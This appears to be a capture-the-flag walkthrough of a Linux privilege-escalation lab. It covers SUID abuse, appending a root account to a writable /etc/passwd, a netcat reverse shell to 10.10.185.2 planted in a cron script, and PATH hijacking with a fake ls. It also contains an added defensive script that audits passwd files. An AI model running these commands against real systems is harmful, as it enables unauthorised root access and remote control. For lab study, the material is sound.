Room Link:
Enumeration
Download LinEnum Script
Kali
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Login to host
Kali
ssh user3@$VICTIM
Password: password
The target's hostname
There are 8 users
4 shells
Some users can write to the /etc/passwd file
Abusing SUID/GUID Files
Victim
find / -perm -u=s -type f 2>/dev/null
Running the shell script in user3's home directory gives us root access right away.
Victim
Exploiting Writeable /etc/passwd
Victim
su user7
Password: password
Victim
openssl passwd -1 -salt new 123
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwd
cat /etc/passwd
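Seen from the defender's side, the line appended above leaves two signs that are easy to audit for: a second UID 0 account, and a password hash stored directly in /etc/passwd instead of /etc/shadow. The script below is an added example, not part of the original walkthrough; the function names and the sample file are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): audit a passwd-format file.

# write_sample FILE: constructed sample data, two ordinary entries plus the
# line that the walkthrough appends to /etc/passwd.
write_sample() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
user7:x:1006:1006:user7,,,:/home/user7:/bin/bash
new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
EOF
}

# audit_passwd FILE: print one finding per line in the form "reason:account".
audit_passwd() {
    awk -F: '
        /^[ \t]*(#|$)/ { next }                        # skip blank and comment lines
        $3 == 0 && $1 != "root" { print "uid0:" $1 }   # extra superuser account
        # field 2 should be x (shadowed) or * / ! (locked), never a hash
        $2 != "x" && $2 != "*" && $2 != "!" && $2 != "" { print "inline-hash:" $1 }
        $2 == "" { print "empty-password:" $1 }        # login without a password
    ' "$1"
}

# passwd_mode_ok FILE: succeed only if neither group nor other can write FILE.
passwd_mode_ok() {
    [ -z "$(find "$1" -prune \( -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

# Demo run on the constructed sample, then a mode check on the live file.
sample=$(mktemp)
write_sample "$sample"
audit_passwd "$sample"
passwd_mode_ok /etc/passwd || echo "writable:/etc/passwd"
rm -f "$sample"
```

Run audit_passwd against /etc/passwd itself on a real host; any output is worth investigating, and passwd_mode_ok failing means the file mode should be restored to 644 with root ownership.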
Escaping Vi Editor
Victim
su user8
Password: password
Victim
Victim
Exploiting Crontab
Victim
ssh user4@$VICTIM
Password: password
Kali
msfvenom -p cmd/unix/reverse_netcat lhost=$KALI lport=8888 R
Kali
Victim
Append the payload we generated on Kali to the script.
Victim
echo 'mkfifo /tmp/cibykaz; nc 10.10.185.2 8888 0</tmp/cibykaz | /bin/sh >/tmp/cibykaz 2>&1; rm /tmp/cibykaz' >> /home/user4/Desktop/autoscript.sh
Wait for the script to run and catch the shell on Kali.
Exploiting PATH Variable
Victim
su user5
Password: password
The script in user5's home directory just runs the ls command.
Victim
cd /home/user5
./script
We now create a script called ls that gives us a bash shell.
Victim
cd /tmp
echo "/bin/bash" > ls
chmod +x ls
Before we change the PATH, ls resolves to /bin/ls.
After running the command below, ls resolves to our script in /tmp instead.
Victim
export PATH=/tmp:$PATH
Now the script in user5's home directory behaves differently: because it calls ls by name, it runs our /tmp/ls and we get a root shell.
Victim
cd /home/user5
./script
Run the following to put the standard directories back ahead of /tmp in the PATH variable.
Victim
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$PATH